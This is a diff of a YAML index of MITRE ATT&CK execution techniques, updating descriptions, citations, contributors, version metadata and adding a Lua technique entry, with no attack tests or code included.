-        Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        Adversaries may also deceive users into performing actions such as:
+
+        * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+        * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+        * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
 
         For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
       kill_chain_phases:
@@ -25618,7 +25927,11 @@ execution:
         phase_name: execution
       x_mitre_contributors:
       - Oleg Skulkin, Group-IB
-      - Goldstein Menachem
+      - Menachem Goldstein
+      - Harikrishnan Muthu, Cyble
+      - ReliaQuest
+      - Ale Houspanossian
+      - Fernando Bacchin
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -25633,7 +25946,7 @@ execution:
       - macOS
       - IaaS
       - Containers
-      x_mitre_version: '1.6'
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Instance: Instance Start'
       - 'File: File Creation'
@@ -25660,6 +25973,10 @@ execution:
         description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
           Bookmarks. Retrieved January 2, 2024.
         url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+      - source_name: Reliaquest-execution
+        description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+          Campaign. Retrieved August 2, 2024.
+        url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
       - source_name: Telephone Attack Delivery
         description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
           4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
@@ -25670,15 +25987,19 @@ execution:
           API forms and more to scam users in popular online game “Roblox”. Retrieved
           January 2, 2024.
         url: https://blog.talosintelligence.com/roblox-scam-overview/
+      - source_name: proofpoint-selfpwn
+        description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+          From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+          2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -25695,7 +26016,7 @@ execution:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -25743,7 +26064,7 @@ execution:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -25776,12 +26097,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests: []
   T1059.001:
     technique:
-      modified: '2024-03-01T18:01:37.575Z'
+      modified: '2024-10-15T16:39:13.228Z'
       name: 'Command and Scripting Interpreter: PowerShell'
       description: |-
         Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -25842,8 +26162,9 @@ execution:
           POWERSHELL LOGGING. Retrieved February 16, 2016.
         url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
       - source_name: Github PSAttack
-        description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
-        url: https://github.com/jaredhaight/PSAttack
+        description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+          2024.
+        url: https://github.com/Exploit-install/PSAttack-1
       - source_name: inv_ps_attacks
         description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
           Retrieved December 1, 2021.
@@ -25865,12 +26186,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.001
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -25948,14 +26268,13 @@ execution:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1059.004:
     technique:
-      modified: '2024-04-16T12:24:40.163Z'
+      modified: '2024-10-15T15:17:19.136Z'
       name: 'Command and Scripting Interpreter: Bash'
       description: |-
         Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -26013,36 +26332,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.004
     atomic_tests: []
   T1559:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
-      type: attack-pattern
-      created: '2020-02-12T14:08:48.689Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1559
-        url: https://attack.mitre.org/techniques/T1559
-      - source_name: Linux IPC
-        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
-        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
-          March 11, 2022.
-      - source_name: Fireeye Hunting COM June 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
-        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
-          10, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-10T19:06:35.666Z'
       name: Inter-Process Communication
       description: "Adversaries may abuse inter-process communication (IPC) mechanisms
         for local code or command execution. IPC is typically used by processes to
@@ -26063,25 +26357,110 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
         or spawned processes that are associated with abuse of IPC mechanisms.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Process: Process Access'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      - SYSTEM
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+      created: '2020-02-12T14:08:48.689Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1559
+        external_id: T1559
+      - source_name: Fireeye Hunting COM June 2019
+        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+          10, 2019.
+        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+      - source_name: Linux IPC
+        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+          March 11, 2022.
+        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1559
     atomic_tests: []
+  T1059.011:
+    technique:
+      modified: '2024-10-01T15:19:54.163Z'
+      name: Lua
+      description: |-
+        Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (<code>.lua</code>), or from Lua-embedded programs (through the <code>struct lua_State</code>).(Citation: Lua main page)(Citation: Lua state)
+
+        Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Script: Script Execution'
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+      created: '2024-08-05T18:19:42.201Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/011
+        external_id: T1059.011
+      - source_name: Kaspersky Lua
+        description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+          APT. Retrieved August 5, 2024.
+        url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+      - source_name: Lua main page
+        description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+        url: https://www.lua.org/start.html
+      - source_name: Lua state
+        description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+        url: https://pgl.yoyo.org/luai/i/lua_State
+      - source_name: Cyphort EvilBunny
+        description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+          Instrumented By Lua. Retrieved August 5, 2024.'
+        url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+      - source_name: PoetRat Lua
+        description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+          public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+        url: https://blog.talosintelligence.com/poetrat-update/
+      - source_name: Lua Proofpoint Sunseed
+        description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+          Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+          Malware to Target European Governments and Refugee Movement. Retrieved August
+          5, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1204.003:
     technique:
       x_mitre_platforms:
@@ -26110,7 +26489,7 @@ execution:
         url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
         description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
           Supply Chain and Infrastructure. Retrieved August 26, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-26T16:42:35.318Z'
       name: 'User Execution: Malicious Image'
       description: |-
         Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
@@ -26137,30 +26516,12 @@ execution:
       - 'Instance: Instance Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1204.003
     atomic_tests: []
   T1203:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
-      created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1203
-        url: https://attack.mitre.org/techniques/T1203
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:34:23.908Z'
+      name: Exploitation for Client Execution
       description: |-
         Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
 
@@ -26177,9 +26538,10 @@ execution:
         ### Common Third-party Applications
 
         Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Exploitation for Client Execution
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Detecting software exploitation may be difficult depending
         on the tools available. Also look for behavior on the endpoint system that
         might indicate successful compromise, such as abnormal behavior of the browser
@@ -26187,21 +26549,37 @@ execution:
         evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
         for attempts to hide execution, evidence of Discovery, or other unusual network
         traffic that may indicate additional tools transferred to the system.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: execution
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
+      - 'File: File Modification'
       - 'Application Log: Application Log Content'
+      - 'Network Traffic: Network Traffic Flow'
+      x_mitre_remote_support: false
       x_mitre_system_requirements:
       - Remote exploitation for execution requires a remotely accessible service reachable
         over the network or other vector of access such as spearphishing or drive-by
         compromise.
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+      created: '2018-04-18T17:59:24.739Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1203
+        external_id: T1203
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.006:
     technique:
@@ -26251,28 +26629,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.006
     atomic_tests: []
   T1569:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
-      type: attack-pattern
-      created: '2020-03-10T18:23:06.482Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569
-        url: https://attack.mitre.org/techniques/T1569
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-20T19:55:40.527Z'
       name: System Services
       description: Adversaries may abuse system services or daemons to execute commands
         or programs. Adversaries can execute malicious content by interacting with
@@ -26283,32 +26644,44 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for command line invocations of tools capable of
         modifying services that doesn’t correspond to normal usage patterns and known
         software, patch cycles, etc. Also monitor for changes to executables and other
         files associated with services. Changes to Windows services may also be reflected
         in the Registry.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
       - 'Service: Service Creation'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      - root
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+      created: '2020-03-10T18:23:06.482Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569
+        external_id: T1569
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1059.003:
     technique:
-      modified: '2024-03-01T17:35:02.889Z'
+      modified: '2024-10-15T15:19:56.540Z'
       name: 'Command and Scripting Interpreter: Windows Command Shell'
       description: |-
         Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
@@ -26351,12 +26724,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.003
     atomic_tests: []
   T1651:
     technique:
-      modified: '2024-04-12T03:27:48.171Z'
+      modified: '2024-10-15T13:42:42.543Z'
       name: Cloud Administration Command
       description: |-
         Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -26413,11 +26785,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:43:27.104Z'
       name: 'Command and Scripting Interpreter: Visual Basic'
       description: |-
         Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -26482,14 +26853,13 @@ execution:
         url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.005
     atomic_tests: []
   T1648:
     technique:
-      modified: '2024-03-05T16:13:38.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Serverless Execution
       description: "Adversaries may abuse serverless computing, integration, and automation
         services to execute arbitrary code in cloud environments. Many cloud providers
@@ -26510,14 +26880,19 @@ execution:
         an adversary may create a Lambda function that automatically adds [Additional
         Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
         and a corresponding CloudWatch events rule that invokes that function whenever
-        a new user is created.(Citation: Backdooring an AWS account) Similarly, an
-        adversary may create a Power Automate workflow in Office 365 environments
-        that forwards all emails a user receives or creates anonymous sharing links
-        whenever a user is granted access to a document in SharePoint.(Citation: Varonis
-        Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+        a new user is created.(Citation: Backdooring an AWS account) This is also
+        possible in many cloud-based office application suites. For example, in Microsoft
+        365 environments, an adversary may create a Power Automate workflow that forwards
+        all emails a user receives or creates anonymous sharing links whenever a user
+        is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+        Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+        environments, they may instead create an Apps Script that exfiltrates a user's
+        data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+        OWN-CERT Google App Script 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
       - Praetorian
@@ -26526,16 +26901,18 @@ execution:
       - Varonis Threat Labs
       - Alex Soler, AttackIQ
       - Vectra AI
+      - OWN
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'Application Log: Application Log Content'
@@ -26561,6 +26938,14 @@ execution:
         description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
           Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
         url: https://www.varonis.com/blog/power-automate-data-exfiltration
+      - source_name: Cloud Hack Tricks GWS Apps Script
+        description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+          2024.
+        url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+      - source_name: OWN-CERT Google App Script 2024
+        description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+          analysis. Retrieved October 2, 2024.
+        url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
       - source_name: Cado Security Denonia
         description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
           Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
@@ -26575,29 +26960,10 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
-      type: attack-pattern
-      created: '2020-03-11T14:43:31.706Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1204.001
-        url: https://attack.mitre.org/techniques/T1204/001
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-10T16:40:03.786Z'
       name: Malicious Link
       description: An adversary may rely upon a user clicking a malicious link in
         order to gain execution. Users may be subjected to social engineering to get
@@ -26610,25 +26976,41 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
 
         Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
